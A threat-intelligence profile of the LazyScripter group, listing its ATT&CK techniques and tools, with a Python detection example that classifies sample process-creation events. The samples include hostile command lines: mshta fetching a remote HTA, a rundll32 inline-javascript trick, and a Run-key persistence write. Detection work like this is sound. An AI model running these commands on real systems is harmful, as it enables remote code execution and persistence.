Introduction
LazyScripter is a threat group that has mainly targeted the airline industry since at least 2018, relying primarily on open-source toolsets [3].
Activities and Tactics
Information pending cataloguing.
Notable Campaigns
Information pending cataloguing.
Tactics, Techniques, and Procedures (TTPs)
- T1204.001 Malicious Link
- T1218.005 Mshta
- T1608.001 Upload Malware
- T1204.002 Malicious File
- T1102 Web Service
- T1059.007 JavaScript
- T1583.001 Domains
- T1059.005 Visual Basic
- T1071.004 DNS
- T1588.001 Malware
- T1105 Ingress Tool Transfer
- T1036 Masquerading
- T1566.001 Spearphishing Attachment
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1027.010 Command Obfuscation
- T1547.001 Registry Run Keys / Startup Folder
- T1218.011 Rundll32
- T1566.002 Spearphishing Link
- T1583.006 Web Services
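The technique list above combines signed Windows binaries (T1218.005 Mshta, T1218.011 Rundll32) with scripting and Run-key persistence (T1547.001), which is the kind of activity visible in endpoint process-creation telemetry. As an added example, not part of this profile or the cited Malwarebytes report, the Python below maps constructed Sysmon-style process-creation events to the listed technique IDs. The sample events, the regular expressions and the technique mapping are illustrative assumptions, not indicators drawn from the report.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 shape), written for
# this example; they are NOT indicators from the Malwarebytes report.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://198.51.100.7/update.hta",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Users\Public\update.bat" /f',
     "parent": r"C:\Windows\System32\cmd.exe"},
    # Benign look-alikes: a Control Panel applet via rundll32 and a local HTA
    # launched by a vendor installer should NOT be flagged.
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta",
     "parent": r"C:\Program Files\Vendor\setup.exe"},
]

# Assumed patterns: a remote payload, an inline script protocol handler, and
# a write to a Run/RunOnce key.
URL_RE = re.compile(r"https?://", re.I)
SCRIPT_PROTO_RE = re.compile(r"\b(javascript|vbscript):", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\b", re.I)
REG_ADD_RE = re.compile(r"\badd\b", re.I)

LOLBINS = {"mshta.exe", "rundll32.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def classify(event: dict) -> set:
    """Return the set of listed ATT&CK technique IDs the event matches."""
    image = _basename(event["image"])
    parent = _basename(event["parent"])
    cmd = event["cmdline"]
    hits = set()

    # T1218.005: mshta fetching a remote HTA or running an inline script.
    if image == "mshta.exe" and (URL_RE.search(cmd) or SCRIPT_PROTO_RE.search(cmd)):
        hits.add("T1218.005")

    # T1218.011: rundll32 abused as a script host rather than loading a DLL export.
    if image == "rundll32.exe" and SCRIPT_PROTO_RE.search(cmd):
        hits.add("T1218.011")

    # T1547.001: reg.exe adding a value under a Run/RunOnce key.
    if image == "reg.exe" and REG_ADD_RE.search(cmd) and RUN_KEY_RE.search(cmd):
        hits.add("T1547.001")

    # T1204.002: a LOLBin spawned directly by an Office application, the usual
    # sign that a user opened a malicious attachment.
    if image in LOLBINS and parent in OFFICE_PARENTS:
        hits.add("T1204.002")

    return hits


def scan(events: list) -> list:
    """Return (index, sorted technique IDs) for every event that matched."""
    results = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((i, sorted(hits)))
    return results


if __name__ == "__main__":
    for idx, techniques in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(techniques)} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

The benign events matter as much as the malicious ones: rundll32 and mshta are used legitimately all the time, so a rule keyed only on the image name would be unusable. Anchoring on the argument shape (remote URL, script protocol handler, Run key write) and on an Office parent keeps the false-positive rate manageable while still covering the techniques this profile lists.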
ATT&CK technique IDs (denormalized)
- T1027.010
- T1036
- T1059.001
- T1059.003
- T1059.005
- T1059.007
- T1071.004
- T1102
- T1105
- T1204.001
- T1204.002
- T1218.005
- T1218.011
- T1547.001
- T1566.001
- T1566.002
- T1583.001
- T1583.006
- T1588.001
- T1608.001
Notable Indicators of Compromise (IOCs)
No atomic indicators are listed in this profile. The APTnotes snapshot indexes 1 public report that may contain IOCs; see Source Attribution for dataset links.
Malware and Tools
- CyberGate
- Cyber Eye RAT
MITRE ATT&CK Software
- Remcos (S0332) — tool
- QuasarRAT (S0262) — tool
- njRAT (S0385) — malware
- ngrok (S0508) — tool
- Empire (S0363) — tool
- Koadic (S0250) — tool
- KOCTOPUS (S0669) — malware
Attribution and Evidence
Information pending cataloguing.
References
[1] mitre-attack
[3] MalwareBytes LazyScripter Feb 2021: Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.